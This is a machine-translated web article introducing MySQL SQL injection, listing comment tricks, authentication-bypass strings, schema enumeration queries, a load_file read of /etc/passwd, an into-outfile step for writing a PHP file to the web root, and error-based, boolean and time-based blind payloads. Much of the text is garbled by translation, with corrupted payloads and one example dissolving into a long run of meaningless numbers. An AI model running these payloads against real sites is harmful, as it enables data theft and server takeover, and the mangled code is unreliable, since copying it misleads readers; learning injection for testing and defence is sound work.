Shulou(Shulou.com)05/31 Report--

This article introduces the relevant knowledge of "introduction to the basics of sql injection". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

What is SQL injection (SQL Injection)

The so-called SQL injection attack is that the attacker inserts the SQL command into the input field of the Web form or the query string of the page request to deceive the server to execute malicious SQL commands. In some forms, where user input is directly used to construct (or influence) dynamic SQL commands, or as input parameters to stored procedures, such forms are particularly vulnerable to SQL injection attacks.

Mysql common notes

#

-- [space] or-- +

/ * … , /

In the process of attention, these comments may all need to be urlencode.

Mysql Authentication Bypass

'or 1 #

'/ *! or * / 1-- +

Mysql connector

Use + to connect in mysql.

Select * from users where username='zhangsan' and "ab" = "a" + "b"

Common functions in mysql

During sql injection, the built-in functions in mysql are used. In the built-in function, it is divided into the function of obtaining information and the function function.

The information function is used to obtain the information of the database in mysql, and the function function is the traditional function used to complete a certain operation.

The commonly used information functions are:

Database (), which is used to get the database information currently in use

Version (): returns the version of the database, equivalent to @ @ version

User (): returns the current user, equivalent to the current_user parameter. Such as:

Select user (); # root@localhostselect current_user; # root@localhost

@ @ datadir to get the storage location of the database.

Select @ @ datadir; # D:\ xampp\ mysql\ data\

Common functional functions are:

Load_file (): loads the file from the computer and reads the data in the file.

Select * from users union select 1 _ loaded _ _ file ('/ etc/passwd'), 3 _ select * from users union select _ 1 _ loaded _ file (0x2F6574632F706173737764), 3; # use hexadecimal to bypass the single quotation mark restriction

Into outfile: write to a file, provided you have write permission

Select''into outfile' / var/www/html/xxx.php';select char (60 into outfile 63 var/www/html/xxx.php';select char) into outfile'/ var/www/html/xxx.php'

Concat (): returns a string that results in a connection parameter. If one of the parameters is null, the return value is null.

The usage is as follows:

Select concat (username,password) from users

* concat_ws (): is a special form of concat_ws (). The first parameter is the delimiter, and the rest is the field name.

Select concat_ws (',', username,password) from users

Group_concat (): used to merge results from multiple records.

The usage is as follows:

The select group_concat (username) from users;# returns all the user names in the users table and is returned as a record.

Subtring (), substr (): used to truncate strings. The usage is: substr (str,pos,length). Note that pos starts with 1.

Select substr ((select database ()), 1)

Ascii (): the usage returns the ascii value corresponding to the character.

Select ascii ('a'); # 97

Length (): returns the length of the string.

Such as:

Select length ("123456") # returns 6

Is (exp1,exp2,exp2): returns exp2; if the expression of exp1 is True, otherwise returns exp3.

Such as:

Select 1, 2, if (1) # 1, 2, 3, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 4, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1, 2, 4, 1, 1, 2, 1, 1, 2, 4, 4, 4, 1, 1, 1, 2, 4, 4, 4, 4, 1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 6, 4, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 1, 6, 6, 6, 6, 6, 6,

These are the functions commonly used in sql injection projects. Of course, there are some functions that don't use a lot.

Now (): returns the current system time

Hex (): returns the hexadecimal of the string

Unhex (): hexadecimal of reverse hex ()

@ @ basedir (): installation directory of reverse mysql

@ @ versin_compile_os: operating system

Mysql database meta-information

Information_schema is an information database in mysql, which stores information about all other databases saved by the Mysql server, such as database names, database tables, and table field names.

And access. The tables commonly used in informa_schema are:

Schemata: stores all the database information in mysql, and the returned content is the same as the result of show databases.

Tables: stores information about tables in the database. A detailed description of a table belongs to which schema, table type, table engine.

The result of show tables from secuiry is from this table.

Columns: details all the columns of a table and the information for each column.

The result of show columns from users is from this table.

The following is to use the above three tables to get the information of the database.

Select database (); # query database select schema_name from information_schema.schemata limit 0Query 1 # query database select table_name from information_schema.tables where table_schema=database () limit 0Query 1; # query table select column_name from information_schema.columns where table_name='users' limit 0Query 1; # query column

Sql injection type

The types of sql injection can be divided into conventional sql injection and sql blind injection. Sql blind note can be divided into time-based blind note and web content-based blind note.

There are also a lot of explanations on the Internet about the blind injection of sql, and there are not too many explanations here. With regard to the concept of blind injection, it is convenient to explain with specific examples.

The common functions in delay injection include the if () and sleep () functions.

The basic sql expression is as follows:

Select * from users where id=1 and if (length (user ()) = 14 from users where id=1 and if (3), 1); select * from users where id=1 and if (mid (user (), 1)) = 'ritual sleep (3), 1)

Wide byte injection

For wide byte injection, you can refer to the wide byte injection for details. Wide-byte input is generally caused by a mismatch between the web page encoding and the database encoding. For wide byte injection, use% d5 or% df bypass

Summary of commonly used sentences in mysql

Conventional injection

1 'order by num # determine the field length 1' union select 1Magne 2 Magazine 3 # determine the field length-1 'union select 1Magazine 2 Magazine 3 # determine the field displayed on the judgment page-1' union select 1Magne 2 schema_name concat (schema_name) from information_schema.schemata # display all databases in mysql-1 'union select 1Magne 2 group_concat (table_name) from information_schema.tables where table_schame = "dbname" / database () / hex (dbname) #-1' union select 1 Person2 Column_name from information_schema.columns where table_name= "table_name" limit 0 1 #-1 'union select 1 limit 2 AND "concat (column_name) from information_schema.columns where table_name=" table_name "/ hex (table_name) limit 0 #-1' union select 1 #-1 'union select 1 can not be used when the comment character cannot be used

Double SQL check and selection

Select concat (0x3a record0x3a, (select database ()), 0x3are0x3a); select count (*), concat (0x3are0x3a, (select database ()), 0x3amemorial0x3a (rand () * 2)) a from information_schema.tables group by a select concat (0x3a record0x3a, (select database ()), 0x3amem0x3a (rand () * 2)) a from information_schema.tables Select count (*), concat (0x3a from information_schema.tables group by a; 0x3a, (select database (), 0x3a sql (rand () * 2)) a from information_schema.tables group by a; # is often used in blind annotation of sql. Get the information of the database select count (*), concat (0x3a limi 0x3a, (select table_name from information_schema.table where table_schema=database () limi 0meme 1), 0x3a journal 0x3a journal (rand () * 2)) a from information_schema.tables group by a # get the information of the tables in the database # make use of the posture as follows: 1 'AND (select 1 from (select count (*), concat (0x3a limi 0x3a, (select table_name from information_schema.table where table_schema=database () limi 0meme 1), 0x3a from information_schema.tables group by a (rand () * 2) a from information_schema.tables group by a) b)-- +

This posture is used to get the required information through the error message when mysql executes the sql command, which will be analyzed in detail in the following article.

Bool blind injection

1 'and ascii (substr (select database (), 1)) > 991' and ascii (substr (select table_name from information_schema.tables limit 0) 1), 1)) > 90

Bool blind injection is based on the sql statement to execute the return value is True or False corresponding to the page content will occur, to get the information.

Time blind injection

1 'AND select if ((select substr (table_name,1,1) from information_schema.tables where table_schema=database () limit 0Pol 1)) =' estranged limit sleep (10), null) + 1 'AND select if (substr ((select table_name from information_schema.tables where table_schema=database () limit 0Pol 1), 1' AND select if) = 'estranged sleep (10), null)-+

The two writing methods mentioned above are equivalent, and the conventional sql injection methods for time blind injection are different. Time blind injection requires the general use of the if () and sleep () functions. Then we know whether the sleep () function has been executed based on the length of the content returned by the page.

Get the required information based on whether the sleep () function executes or not.

This is the end of the introduction to the basics of sql injection. Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.